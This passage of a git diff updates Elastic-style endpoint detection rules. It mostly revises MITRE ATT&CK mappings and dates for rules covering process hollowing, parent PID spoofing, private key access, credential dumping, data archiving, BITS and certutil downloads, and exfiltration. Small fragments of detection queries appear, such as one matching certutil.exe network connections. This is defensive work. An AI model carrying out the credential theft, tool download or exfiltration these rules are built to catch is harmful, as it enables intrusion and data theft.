@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -162,19 +162,46 @@ process.parent.name != null and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.004" +name = "Parent PID Spoofing" +reference = "https://attack.mitre.org/techniques/T1134/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 5205c3c67f0..41942914eca 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,36 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index cb89a43db4b..35c9d4192d8 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,14 +93,18 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml index 445af055e36..fe0eec74932 100644 --- a/rules_building_block/collection_archive_data_zip_imageload.toml +++ b/rules_building_block/collection_archive_data_zip_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -56,14 +56,18 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_common_compressed_archived_file.toml b/rules_building_block/collection_common_compressed_archived_file.toml index 5742ea8c024..8b77228182d 100644 --- a/rules_building_block/collection_common_compressed_archived_file.toml 
+++ b/rules_building_block/collection_common_compressed_archived_file.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = "endpoint" maturity = "production" -updated_date = "2025/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,58 +76,64 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique.subtechnique]] id = "T1074.001" name = "Local Data Staging" reference = "https://attack.mitre.org/techniques/T1074/001/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" + [[rule.threat.technique.subtechnique]] id = "T1560.001" name = "Archive via Utility" reference = "https://attack.mitre.org/techniques/T1560/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1132" name = "Data Encoding" reference = "https://attack.mitre.org/techniques/T1132/" + [[rule.threat.technique.subtechnique]] id = "T1132.001" name = "Standard Encoding" reference = "https://attack.mitre.org/techniques/T1132/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules_building_block/collection_files_staged_in_recycle_bin_root.toml b/rules_building_block/collection_files_staged_in_recycle_bin_root.toml index 5fd3ef741f5..e78b29e10e9 100644 --- a/rules_building_block/collection_files_staged_in_recycle_bin_root.toml +++ b/rules_building_block/collection_files_staged_in_recycle_bin_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -43,19 +43,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique.subtechnique]] id = "T1074.001" name = "Local Data Staging" reference = "https://attack.mitre.org/techniques/T1074/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/collection_microsoft_purview_dlp_signal.toml b/rules_building_block/collection_microsoft_purview_dlp_signal.toml index bfc6b8ca0b3..03a5db7e642 100644 --- a/rules_building_block/collection_microsoft_purview_dlp_signal.toml +++ b/rules_building_block/collection_microsoft_purview_dlp_signal.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -56,13 +56,39 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules_building_block/collection_outlook_email_archive.toml b/rules_building_block/collection_outlook_email_archive.toml index 529eff840b9..ad3153f2733 100644 --- a/rules_building_block/collection_outlook_email_archive.toml +++ b/rules_building_block/collection_outlook_email_archive.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -52,19 +52,23 @@ process where host.os.type == "windows" and event.type == "start" and process.ar [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" reference = "https://attack.mitre.org/techniques/T1114/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 621b225c547..281482a083f 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -207,34 +207,44 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 3952b06069b..d4e57b19af3 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -57,38 +57,44 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1197" -name = "BITS Jobs" -reference = "https://attack.mitre.org/techniques/T1197/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/command_and_control_certutil_network_connection.toml b/rules_building_block/command_and_control_certutil_network_connection.toml index 4ed4c5547f0..c4ccf43c4ee 100644 --- a/rules_building_block/command_and_control_certutil_network_connection.toml +++ b/rules_building_block/command_and_control_certutil_network_connection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/03/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.investigate]] 
@@ -163,14 +163,26 @@ network where host.os.type == "windows" and process.name : "certutil.exe" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index 5701fe075a7..cb59a5d1761 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml +++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -56,31 +56,36 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 74f8692331c..f73fe1603bd 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -54,29 +54,35 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 6eb634e33de..6850fbdf214 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml +++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -49,14 +49,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/credential_access_win_private_key_access.toml b/rules_building_block/credential_access_win_private_key_access.toml index c4ef158a6dc..74149cb7985 100644 --- a/rules_building_block/credential_access_win_private_key_access.toml +++ b/rules_building_block/credential_access_win_private_key_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -74,19 +74,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml b/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml index b46bd062dc8..47797a8332d 100644 --- a/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml +++ b/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -48,31 +48,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 87e086c3d31..630b6740fe8 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -83,24 +83,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 79332fc5371..363c2625cf8 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -40,24 +40,28 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 0e65e8b4c34..2b11ed47d61 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -61,22 +61,25 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -87,10 +90,25 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index 2eecbdb9c35..263944fd022 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,26 +78,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index ba036559b71..4092da460aa 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,19 +54,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 6d1c96172e8..20edb1bd2e4 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -52,43 +52,54 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE 